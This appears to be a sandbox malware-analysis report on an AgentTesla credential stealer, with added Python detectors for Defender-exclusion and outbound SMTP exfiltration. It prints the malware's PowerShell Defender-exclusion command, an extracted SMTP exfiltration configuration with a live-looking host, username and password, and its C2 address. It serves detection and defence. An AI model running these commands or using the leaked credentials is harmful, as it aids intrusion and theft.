
Windows Analysis Report
PO234400.exe

Overview

General Information

Sample name: PO234400.exe
Analysis ID: 1410984
MD5: 1ed78424905206c4549ac51b97b5120b
SHA1: bd106b43a6cad1fc21d8b71cb70c86295a9439b7
SHA256: 5ca87353c4d37e66f76875a46235208796dd620ad3cb7cebc6b5e66be55b2913
Tags: AgentTesla, exe

Detection

Detected family: AgentTesla
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Injects a PE file into a foreign processes
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Outbound SMTP Connections
Tries to load missing DLLs
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • PO234400.exe (PID: 7276 cmdline: C:\Users\user\Desktop\PO234400.exe MD5: 1ED78424905206C4549AC51B97B5120B)
    • powershell.exe (PID: 7460 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO234400.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7724 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • PO234400.exe (PID: 7484 cmdline: C:\Users\user\Desktop\PO234400.exe MD5: 1ED78424905206C4549AC51B97B5120B)
    • PO234400.exe (PID: 7516 cmdline: C:\Users\user\Desktop\PO234400.exe MD5: 1ED78424905206C4549AC51B97B5120B)
  • cleanup
Threat intelligence (Malpedia)
Name: Agent Tesla (AgentTesla)
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Extracted malware configuration:
{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.mbarieservicesltd.com", "Username": "saless@mbarieservicesltd.com", "Password": "     *o9H+18Q4%;M     "}
YARA matches (source: rule, description, author)

Network capture:
  dump.pcap: JoeSecurity_AgentTesla_1, Yara detected AgentTesla, Joe Security

Memory dumps:
  00000006.00000002.2607967300.000000000322A000.00000004.00000800.00020000.00000000.sdmp: JoeSecurity_AgentTesla_1, Yara detected AgentTesla, Joe Security
  00000006.00000002.2606062779.0000000000402000.00000040.00000400.00020000.00000000.sdmp: JoeSecurity_AgentTesla_2, Yara detected AgentTesla, Joe Security
  00000006.00000002.2607967300.00000000031D1000.00000004.00000800.00020000.00000000.sdmp: JoeSecurity_CredentialStealer, Yara detected Credential Stealer, Joe Security
  00000006.00000002.2607967300.00000000031D1000.00000004.00000800.00020000.00000000.sdmp: JoeSecurity_AgentTesla_1, Yara detected AgentTesla, Joe Security
  00000000.00000002.1379891077.00000000040EE000.00000004.00000800.00020000.00000000.sdmp: JoeSecurity_AgentTesla_2, Yara detected AgentTesla, Joe Security
  (3 further entries collapsed in the report)

Unpacked PE files:
  0.2.PO234400.exe.418b348.6.unpack: JoeSecurity_AgentTesla_2, Yara detected AgentTesla, Joe Security
  0.2.PO234400.exe.4162328.5.unpack: JoeSecurity_AgentTesla_2, Yara detected AgentTesla, Joe Security
  6.2.PO234400.exe.400000.0.unpack: JoeSecurity_AgentTesla_2, Yara detected AgentTesla, Joe Security
  0.2.PO234400.exe.418b348.6.raw.unpack: JoeSecurity_AgentTesla_2, Yara detected AgentTesla, Joe Security
  0.2.PO234400.exe.4162328.5.raw.unpack: JoeSecurity_AgentTesla_2, Yara detected AgentTesla, Joe Security

                        System Summary

Sigma matches

Rule author: Florian Roth (Nextron Systems); event: process started.
  Command / CommandLine / ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO234400.exe
  CommandLine|base64offset|contains: ~2yzw
  Image / NewProcessName / OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  ParentCommandLine: C:\Users\user\Desktop\PO234400.exe; ParentImage: C:\Users\user\Desktop\PO234400.exe; ParentProcessId: 7276; ParentProcessName: PO234400.exe
  ProcessId: 7460; ProcessName: powershell.exe
  Note: the command line names the System32 PowerShell but the Image is the SysWOW64 copy. The parent is a 32-bit PE, so WoW64 file-system redirection resolves System32 to SysWOW64; detections keyed on the image path must account for both.

Second rule by the same author, matched on the same PowerShell process-start event (event data identical to the entry above).

Rule author: frack113; event: network connection.
  DestinationIp: 199.79.62.115; DestinationIsIpv6: false; DestinationPort: 587; EventID: 3; Image: C:\Users\user\Desktop\PO234400.exe; Initiated: true; ProcessId: 7516; Protocol: tcp; SourceIp: 192.168.2.8; SourceIsIpv6: false; SourcePort: 49708

Rule author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); event: process started (the same PowerShell process-start event as above, event data identical).
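The Defender-exclusion pattern above (PO234400.exe spawning PowerShell to exclude its own path) is the one thing in this report a defender can detect before any exfiltration happens. The following is an added example, not part of the Joe Sandbox report: it classifies process-creation events in the spirit of the two Sigma signatures listed ("Powershell Defender Exclusion" and "Powershell Base64 Encoded MpPreference Cmdlet"), decoding -EncodedCommand payloads (Base64 of UTF-16LE) before matching, and additionally flags the case where the excluded path is the parent process's own image. Field names follow Sysmon Event ID 1; the first sample event is the event data from this report, the other two events are constructed for the example.

```python
"""Added example (not from the Joe Sandbox report): detect PowerShell adding
Microsoft Defender exclusions, including the -EncodedCommand variant, and flag
a parent process that excludes its own executable (the pattern in this report).
"""
import base64
import re

MPPREF_RE = re.compile(r"\b(?:Add|Set)-MpPreference\b", re.IGNORECASE)
EXCLUSION_RE = re.compile(r"-Exclusion(?:Path|Process|Extension|IpAddress)\b", re.IGNORECASE)
# -EncodedCommand plus the shorter prefixes PowerShell accepts, followed by Base64 text.
ENCODED_RE = re.compile(
    r"(?:^|\s)[-/](?:encodedcommand|encoded|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE
)
# Value(s) handed to -ExclusionPath, up to the next "-Switch" or end of line.
EXCL_PATH_RE = re.compile(r"-ExclusionPath\s+(.+?)(?=\s+-\w|$)", re.IGNORECASE)


def encode_powershell_command(script: str) -> str:
    """Base64(UTF-16LE) as PowerShell expects for -EncodedCommand (used to build test input)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if the line has none."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def exclusion_paths(text: str):
    """Lower-cased, unquoted paths passed to -ExclusionPath (comma lists allowed)."""
    paths = []
    for m in EXCL_PATH_RE.finditer(text):
        for part in m.group(1).split(","):
            paths.append(part.strip().strip('"\'').lower())
    return paths


def inspect_event(event: dict) -> dict:
    """Classify one process-creation event; 'reasons' stays empty for benign events."""
    cmdline = event.get("CommandLine", "")
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else decoded  # what PowerShell will actually run
    reasons = []
    if MPPREF_RE.search(text) and EXCLUSION_RE.search(text):
        reasons.append("defender_exclusion")
        if decoded is not None:
            reasons.append("encoded_mppreference")
        parent = event.get("ParentImage", "").lower()
        if parent and parent in exclusion_paths(text):
            reasons.append("parent_excludes_itself")  # dropper whitelisting itself
    return {"ProcessId": event.get("ProcessId"), "alert": bool(reasons),
            "reasons": reasons, "decoded": decoded}


SAMPLE_EVENTS = [
    # Event data taken from this report (PID 7460, parent PID 7276).
    {"ProcessId": 7460, "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO234400.exe',
     "ParentImage": r"C:\Users\user\Desktop\PO234400.exe"},
    # Constructed: the same cmdlet hidden behind -EncodedCommand.
    {"ProcessId": 9001, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc "
                    + encode_powershell_command(r'Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svc.exe"'),
     "ParentImage": r"C:\Users\user\AppData\Roaming\svc.exe"},
    # Constructed benign: an administrator reading the current preferences.
    {"ProcessId": 9002, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Get-MpPreference",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for result in map(inspect_event, SAMPLE_EVENTS):
        print(result)
```

Matching on the decoded payload rather than the raw command line is what separates the two Sigma rules the report lists; running both checks over the same event stream, as here, means an encoded `Add-MpPreference` is not missed just because the literal cmdlet name never appears in the process-creation log.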
Snort IDS alerts: six alerts at 03/18/24-14:30:28.601602, all on the same TCP flow (source port 49708 -> destination port 587), classtype "A Network Trojan was detected". SIDs: 2840032, 2855542, 2855245, 2851779, 2030171, 2839723.

                        AV Detection

Source: http://mail.mbarieservicesltd.com; Avira URL Cloud: Label: malware
Source: powershell.exe.7460.3.memstrmin; Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.mbarieservicesltd.com", "Username": "saless@mbarieservicesltd.com", "Password": " *o9H+18Q4%;M "}
Source: PO234400.exe; ReversingLabs: Detection: 60%
Source: PO234400.exe; Joe Sandbox ML: detected
Source: PO234400.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: PO234400.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: YgrO.pdb source: PO234400.exe
Source: Binary string: YgrO.pdbSHA256_ source: PO234400.exe

                        Networking

Source: Traffic; Snort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.8:49708 -> 199.79.62.115:587
Source: Traffic; Snort IDS: 2855245 ETPRO TROJAN Agent Tesla Exfil via SMTP 192.168.2.8:49708 -> 199.79.62.115:587
Source: Traffic; Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.8:49708 -> 199.79.62.115:587
Source: Traffic; Snort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.8:49708 -> 199.79.62.115:587
Source: Traffic; Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.8:49708 -> 199.79.62.115:587
Source: Traffic; Snort IDS: 2839723 ETPRO TROJAN Win32/Agent Tesla SMTP Activity 192.168.2.8:49708 -> 199.79.62.115:587
Source: global traffic; TCP traffic: 192.168.2.8:49708 -> 199.79.62.115:587
Source: Joe Sandbox View; IP Address: 199.79.62.115
Source: Joe Sandbox View; ASN Name: PUBLIC-DOMAIN-REGISTRYUS
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; DNS traffic detected: queries for: mail.mbarieservicesltd.com
Source: PO234400.exe, 00000006.00000002.2607967300.000000000322A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://mail.mbarieservicesltd.com
Source: PO234400.exe, 00000006.00000002.2607967300.000000000322A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://mbarieservicesltd.com
Source: PO234400.exe, 00000000.00000002.1378595010.0000000002F57000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: PO234400.exe; String found in binary or memory: http://tempuri.org/DataSet1.xsd
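Every network finding above is one flow: PO234400.exe (PID 7516) connecting from 192.168.2.8:49708 to 199.79.62.115:587 after querying mail.mbarieservicesltd.com, which is exactly the host and port in the extracted configuration. The following is an added example, not part of the Joe Sandbox report: it applies the idea behind the "Suspicious Outbound SMTP Connections" Sigma hit (outbound TCP to a mail-submission port from a process that is not a mail client) to Sysmon-style Event ID 3 records, enriches each hit with the name the process resolved (Event ID 22), and checks the hit against the extracted AgentTesla config. The first connection event is the report's data; the other events, the mail-client allowlist and the assumption that the DNS query for mail.mbarieservicesltd.com resolved to 199.79.62.115 are constructed for this example.

```python
"""Added example (not from the Joe Sandbox report): flag outbound SMTP from
non-mail processes, attach the DNS name behind the destination, and confirm the
flow against the sandbox-extracted AgentTesla SMTP configuration.
"""
SMTP_PORTS = {25, 465, 587, 2525}
# Constructed allowlist of legitimate mail clients, matched by image basename.
MAIL_CLIENTS = {"outlook.exe", "thunderbird.exe"}

# Configuration as extracted by the sandbox (password omitted here on purpose).
AGENTTESLA_CONFIG = {"Exfil Mode": "SMTP", "Port": "587",
                     "Host": "mail.mbarieservicesltd.com",
                     "Username": "saless@mbarieservicesltd.com"}

SAMPLE_CONNECTIONS = [
    # Network-connection event from this report (Sysmon Event ID 3 field names).
    {"EventID": 3, "ProcessId": 7516, "Image": r"C:\Users\user\Desktop\PO234400.exe",
     "Initiated": True, "Protocol": "tcp", "SourceIp": "192.168.2.8", "SourcePort": 49708,
     "DestinationIp": "199.79.62.115", "DestinationPort": 587},
    # Constructed: a real mail client on the same port is allowlisted.
    {"EventID": 3, "ProcessId": 4242,
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "Initiated": True, "Protocol": "tcp", "SourceIp": "192.168.2.8", "SourcePort": 49800,
     "DestinationIp": "52.96.0.1", "DestinationPort": 587},
    # Constructed: same malware process over HTTPS, not an SMTP finding.
    {"EventID": 3, "ProcessId": 7516, "Image": r"C:\Users\user\Desktop\PO234400.exe",
     "Initiated": True, "Protocol": "tcp", "SourceIp": "192.168.2.8", "SourcePort": 49801,
     "DestinationIp": "203.0.113.9", "DestinationPort": 443},
]
SAMPLE_DNS = [
    # QueryName is from the report; the resolved address is an assumption.
    # Sysmon writes IPv4 answers as v4-mapped IPv6 ("::ffff:a.b.c.d;").
    {"EventID": 22, "ProcessId": 7516, "Image": r"C:\Users\user\Desktop\PO234400.exe",
     "QueryName": "mail.mbarieservicesltd.com", "QueryResults": "::ffff:199.79.62.115;"},
]


def image_basename(image: str) -> str:
    return image.rsplit("\\", 1)[-1].lower()


def is_suspicious_smtp(event: dict) -> bool:
    """Outbound TCP to an SMTP port from a process that is not a known mail client."""
    return (event.get("EventID") == 3
            and event.get("Initiated") is True
            and event.get("Protocol", "").lower() == "tcp"
            and event.get("DestinationPort") in SMTP_PORTS
            and image_basename(event.get("Image", "")) not in MAIL_CLIENTS)


def resolved_names(dns_events) -> dict:
    """Map each answered address to the set of query names that produced it."""
    names = {}
    for ev in dns_events:
        for addr in ev.get("QueryResults", "").split(";"):
            addr = addr.strip()
            if addr.startswith("::ffff:"):
                addr = addr[len("::ffff:"):]
            if addr:
                names.setdefault(addr, set()).add(ev["QueryName"].lower())
    return names


def triage(conn_events, dns_events, config) -> list:
    """Alerts for suspicious SMTP flows, annotated with DNS name and config match."""
    names = resolved_names(dns_events)
    alerts = []
    for ev in conn_events:
        if not is_suspicious_smtp(ev):
            continue
        hosts = names.get(ev["DestinationIp"], set())
        alerts.append({
            "ProcessId": ev["ProcessId"],
            "Image": ev["Image"],
            "dst": f'{ev["DestinationIp"]}:{ev["DestinationPort"]}',
            "resolved_hosts": sorted(hosts),
            # True when the flow is the exfil channel described by the extracted config.
            "config_match": (config.get("Exfil Mode") == "SMTP"
                             and str(ev["DestinationPort"]) == config.get("Port")
                             and config.get("Host", "").lower() in hosts),
        })
    return alerts


if __name__ == "__main__":
    for alert in triage(SAMPLE_CONNECTIONS, SAMPLE_DNS, AGENTTESLA_CONFIG):
        print(alert)
```

Keying the allowlist on the process image rather than on the destination is deliberate: AgentTesla uses a compromised or attacker-controlled mail account on an ordinary mail host, so the destination itself looks like legitimate mail submission and only the sending process gives it away.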
Source: C:\Users\user\Desktop\PO234400.exe; Code functions: 0_2_012CD364, 0_2_07B1BAF0, 0_2_07B15688, 0_2_07B15653, 0_2_07B171E8, 0_2_07B15EF8, 0_2_07B15AC0, 0_2_07B18A30, 0_2_07B12951
Source: C:\Users\user\Desktop\PO234400.exe; Code functions: 6_2_01604140, 6_2_01604D58, 6_2_0160F7B0, 6_2_01604488, 6_2_0691E790, 6_2_069145F0, 6_2_06917D00, 6_2_0691CC10, 6_2_06919DC0, 6_2_0691432C
Source: PO234400.exe, 00000000.00000000.1360411575.0000000000AFE000.00000002.00000001.01000000.00000003.sdmp; Binary or memory string: OriginalFilenameYgrO.exe: vs PO234400.exe
Source: PO234400.exe, 00000000.00000002.1387729571.00000000075C0000.00000004.08000000.00040000.00000000.sdmp; Binary or memory string: OriginalFilenameTyrone.dll8 vs PO234400.exe
Source: PO234400.exe, 00000000.00000002.1378595010.0000000002F71000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: OriginalFilename7b99aba2-3c62-4861-97de-170caa2c3039.exe4 vs PO234400.exe
Source: PO234400.exe, 00000000.00000002.1376728133.000000000102E000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameclr.dllT vs PO234400.exe
Source: PO234400.exe, 00000000.00000002.1387278956.0000000007262000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: OriginalFilenamePowerShell.EXEj% vs PO234400.exe
Source: PO234400.exe, 00000000.00000002.1379891077.00000000040EE000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: OriginalFilename7b99aba2-3c62-4861-97de-170caa2c3039.exe4 vs PO234400.exe
Source: PO234400.exe, 00000000.00000002.1379891077.00000000040EE000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameTyrone.dll8 vs PO234400.exe
Source: PO234400.exe, 00000006.00000002.2606062779.000000000042C000.00000040.00000400.00020000.00000000.sdmp; Binary or memory string: OriginalFilename7b99aba2-3c62-4861-97de-170caa2c3039.exe4 vs PO234400.exe
Source: PO234400.exe, 00000006.00000002.2606321660.00000000012F9000.00000004.00000010.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameUNKNOWN_FILET vs PO234400.exe
Source: PO234400.exe; Binary or memory string: OriginalFilenameYgrO.exe: vs PO234400.exe
Source: C:\Users\user\Desktop\PO234400.exe; Sections loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll (x2), uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, dwrite.dll, amsi.dll, userenv.dll, msasn1.dll, gpapi.dll, windowscodecs.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Sections loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll (x2), cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, msasn1.dll, amsi.dll, userenv.dll, profapi.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll, microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll
Source: C:\Users\user\Desktop\PO234400.exe; Sections loaded: mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll (x2), uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, wbemcomn.dll, amsi.dll, userenv.dll, sspicli.dll, vaultcli.dll, wintypes.dll, iphlpapi.dll, dnsapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, winnsi.dll, mswsock.dll, rasadhlp.dll, fwpuclnt.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe; Sections loaded: fastprox.dll, ncobjapi.dll, wbemcomn.dll (x2), kernel.appcore.dll, mpclient.dll, userenv.dll, version.dll, msasn1.dll, wmitomi.dll, mi.dll, miutils.dll, gpapi.dll
Note: the second PO234400.exe module list differs from the first in loading vaultcli.dll (the Windows Credential Manager client library) together with wbemcomn.dll (WMI client), dnsapi.dll, mswsock.dll and fwpuclnt.dll (DNS resolution and Winsock), which is consistent with the credential-theft, WMI hardware-query and SMTP signatures above being produced by the injected payload rather than by the initial loader.
                        Source: PO234400.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: PO234400.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: 0.2.PO234400.exe.418b348.6.raw.unpack, O.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.PO234400.exe.418b348.6.raw.unpack, O.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                        Source: 0.2.PO234400.exe.418b348.6.raw.unpack, P.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.PO234400.exe.418b348.6.raw.unpack, P.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.PO234400.exe.418b348.6.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.PO234400.exe.75c0000.9.raw.unpack, dG0cRqRa8r2T3nra0D.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.PO234400.exe.75c0000.9.raw.unpack, IZKjU01Eq84VxH2YtA.cs | Security API names: _0020.SetAccessControl
                        Source: 0.2.PO234400.exe.75c0000.9.raw.unpack, IZKjU01Eq84VxH2YtA.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.PO234400.exe.75c0000.9.raw.unpack, IZKjU01Eq84VxH2YtA.cs | Security API names: _0020.AddAccessRule
                        Source: 0.2.PO234400.exe.2f4f174.3.raw.unpack, ReactionVessel.cs | Suspicious method names: .ReactionVessel.Inject
                        Source: 0.2.PO234400.exe.6000000.8.raw.unpack, ReactionVessel.cs | Suspicious method names: .ReactionVessel.Inject
                        Source: 0.2.PO234400.exe.2f7ff00.2.raw.unpack, ReactionVessel.cs | Suspicious method names: .ReactionVessel.Inject
                        Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@9/6@1/1
                        Source: C:\Users\user\Desktop\PO234400.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO234400.exe.log
                        Source: C:\Users\user\Desktop\PO234400.exe | Mutant created: NULL
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7508:120:WilError_03
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a05r2hnr.pls.ps1
                        Source: PO234400.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                        Source: C:\Users\user\Desktop\PO234400.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\Desktop\PO234400.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\PO234400.exe | File read: C:\Users\user\Desktop\desktop.ini
                        Source: C:\Users\user\Desktop\PO234400.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                        Source: PO234400.exe | ReversingLabs: Detection: 60%
                        Source: unknown | Process created: C:\Users\user\Desktop\PO234400.exe C:\Users\user\Desktop\PO234400.exe
                        Source: C:\Users\user\Desktop\PO234400.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO234400.exe
                        Source: C:\Users\user\Desktop\PO234400.exe | Process created: C:\Users\user\Desktop\PO234400.exe C:\Users\user\Desktop\PO234400.exe
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                        Source: C:\Users\user\Desktop\PO234400.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO234400.exe
                        Source: C:\Users\user\Desktop\PO234400.exe | Process created: C:\Users\user\Desktop\PO234400.exe C:\Users\user\Desktop\PO234400.exe
                        Source: C:\Users\user\Desktop\PO234400.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                        Source: Window Recorder | Window detected: More than 3 window changes detected
                        Source: C:\Users\user\Desktop\PO234400.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                        Source: C:\Users\user\Desktop\PO234400.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                        Source: PO234400.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: PO234400.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: PO234400.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: Binary string: YgrO.pdb source: PO234400.exe
                        Source: Binary string: YgrO.pdbSHA256_ source: PO234400.exe

                        Data Obfuscation

                        Source: PO234400.exe, Form9.cs | .Net Code: InitializeComponent contains xor as well as GetObject
                        Source: 0.2.PO234400.exe.75c0000.9.raw.unpack, IZKjU01Eq84VxH2YtA.cs | .Net Code: lgJAWSGwI5 System.Reflection.Assembly.Load(byte[])
                        Source: PO234400.exe | Static PE information: 0xF37F2E8A [Mon Jun 15 09:21:14 2099 UTC]
                        Source: C:\Users\user\Desktop\PO234400.exe | Code function: 0_2_012C01A9 push esp; ret 0_2_012C01B3
                        Source: C:\Users\user\Desktop\PO234400.exe | Code function: 6_2_069104B0 push es; ret 6_2_069104C0
                        Source: PO234400.exe | Static PE information: section name: .text entropy: 7.8603183590444825
                        Source: 0.2.PO234400.exe.75c0000.9.raw.unpack, aHaM0V3Y6ypixdFZQS.cs | High entropy of concatenated method names: 'gCsF7k4lAU', 'aiNFVBSXXg', 'CcEF0qZveA', 'mCwFC4fbmN', 'CG0FI05jaS', 'dTGFJyM4TB', 'Next', 'Next', 'Next', 'NextBytes'
                        Source: 0.2.PO234400.exe.75c0000.9.raw.unpack, IZKjU01Eq84VxH2YtA.cs | High entropy of concatenated method names: 'AntjrPoMlO', 'z7Ij8ZfGt2', 'Wkqj4H6rGH', 'VYbjfrS5RR', 'A1AjcENMBU', 'kBrjbIXyyg', 'JCxj3OW3h6', 'kDojadXbPc', 'zBljQaNNhl', 'XEdjo3nOP5'
                        Source: 0.2.PO234400.exe.75c0000.9.raw.unpack, dG0cRqRa8r2T3nra0D.cs | High entropy of concatenated method names: 'UmS4IFLhGb', 'FvM4E0fPKU', 'shc4PvBehN', 'RCw4ZfhXgR', 'IUc4dSekII', 'ho54yTApZN', 'BQC4xKtIOA', 'mVr46et30n', 'IXS4tm90qe', 's264mVbeKn'
                        Source: 0.2.PO234400.exe.75c0000.9.raw.unpack, gP5fS0ThqVLnq2uc8A.cs | High entropy of concatenated method names: 'dwx3ibeovC', 'u4w3R26YEJ', 'UKU3WGWpsB', 'Wnp3sZYGqJ', 'A7S3HhF5fe', 'h3p31ikBx1', 'yuY3U7w898', 'JYS3we4VFa', 'wPy35yvTHZ', 'gGp3O5X8U2'
